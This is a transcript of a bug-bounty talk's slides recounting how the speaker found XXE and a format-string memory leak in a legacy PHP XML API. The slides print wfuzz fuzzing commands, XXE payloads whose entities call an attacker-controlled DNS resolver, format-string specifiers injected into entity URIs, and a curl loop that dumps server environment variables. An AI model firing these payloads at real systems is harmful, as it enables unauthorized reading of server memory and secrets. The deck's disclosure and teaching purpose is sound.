Web based format injection, dumping memory like it's 99 (or "Please help")

Transcript

1. @fransrosen Web based format injection, dumping memory like it's 99

   or "Please help"

2. @fransrosen Public Bug Bounty

3. @fransrosen RCE is 30,000 USD

4. @fransrosen Methodology • Found a domain not like the other

   ones

5. @fransrosen Methodology • Found a domain not like the other

   ones • Legacy on-premise PHP-app acquired by a huge tech organization

6. @fransrosen Methodology • Found a domain not like the other

   ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available

7. @fransrosen Methodology • Found a domain not like the other

   ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available 👍 👍 👍

8. @fransrosen Methodology • Google + GitHub etc

9. @fransrosen Methodology • Google + GitHub etc

10. @fransrosen Methodology • Google + GitHub etc

11. @fransrosen Methodology • Google + GitHub etc

12. @fransrosen Methodology • Google + GitHub etc • wfuzz!

13. @fransrosen Methodology • Google + GitHub etc • wfuzz! Interesting

    path: /cgi-bin/default/

14. @fransrosen Methodology • Google + GitHub etc • wfuzz! python

    wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \
 -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/FUZZ

15. @fransrosen Methodology • Google + GitHub etc • wfuzz!

16. @fransrosen Methodology • Google + GitHub etc • wfuzz! /cgi-bin/default/php/

17. @fransrosen Methodology • Google + GitHub etc • wfuzz! python

    wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \
 -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/php/FUZZ

18. @fransrosen Methodology • Google + GitHub etc • wfuzz!

19. @fransrosen xml_api?

20. @fransrosen xml_api?

21. @fransrosen xml_api? YEAH! 👍

22. @fransrosen wtf!?

23. @fransrosen XXE!

24. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">

25. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">

26. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

27. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

28. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>

    <Envelope><Body><exec><transaction>&exl;</transaction>
 </exec></Body></Envelope>

29. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>

    <Envelope><Body><exec><transaction>&exl;</transaction>
 </exec></Body></Envelope>

30. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

31. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

32. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> ???

33. @fransrosen

34. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

35. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

36. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

37. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

38. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> WOAH.

39. @fransrosen Format String Injection?

40. @fransrosen Format String Injection ON ZE WEB?

41. @fransrosen Format String Injection http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf

42. @fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM

    "%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

43. @fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM

    "%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

44. @fransrosen I can’t handle this shit

45. @fransrosen Help me, zetatwo

46. @fransrosen Help me, zetatwo

47. @fransrosen Help me, zetatwo

48. @fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY

    exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

49. @fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY

    exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

50. @fransrosen Limitations 0x20-0xFF (no 0x22)

51. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

52. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

53. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

54. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

55. @fransrosen We can read all ENVs for i in $(seq

    8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]>
 <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'

56. @fransrosen We can read all ENVs for i in $(seq

    8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]>
 <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'

57. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

58. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

59. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

60. @fransrosen Want to collaborate? @fransrosen

61. @fransrosen Questions? Suggestions?